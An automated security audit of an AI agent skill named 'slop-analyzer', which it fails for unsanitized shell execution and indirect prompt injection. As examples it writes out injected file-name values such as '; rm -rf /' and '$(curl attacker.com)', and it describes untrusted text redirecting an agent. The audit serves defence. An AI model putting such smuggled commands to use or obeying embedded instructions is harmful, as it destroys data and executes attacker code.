slop-analyzer
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Command Execution] (HIGH): The skill executes a shell command using
bun run ./scripts/slop-score/analyze.js --all <filepath>. There is no evidence of sanitization for the<filepath>parameter. An attacker could provide a malicious filename containing shell metacharacters (e.g.,; rm -rf /or$(curl attacker.com)) to achieve arbitrary code execution on the host system. - [Indirect Prompt Injection] (HIGH): This skill's primary function is to ingest and analyze untrusted external content (text files). It lacks explicit boundary markers or instructions to ignore embedded commands within the analyzed text.
- Ingestion points: The text file content passed to the
analyze.jsscript and subsequently processed by the agent. - Boundary markers: None specified in the prompt instructions to the agent.
- Capability inventory: Capability to execute shell commands (
bun run) and provide feedback that influences the parent agent's state/decisions. - Sanitization: None provided for the file content or the resulting output from the script.
- [Remote Code Execution] (MEDIUM): The skill relies on an external script located at
./scripts/slop-score/analyze.js. While this is a local path, the security of the skill depends entirely on the integrity of this unprovided script. If this script is modified or downloaded from an untrusted source, it could perform malicious actions.
Recommendations
- AI detected serious security threats
Audit Metadata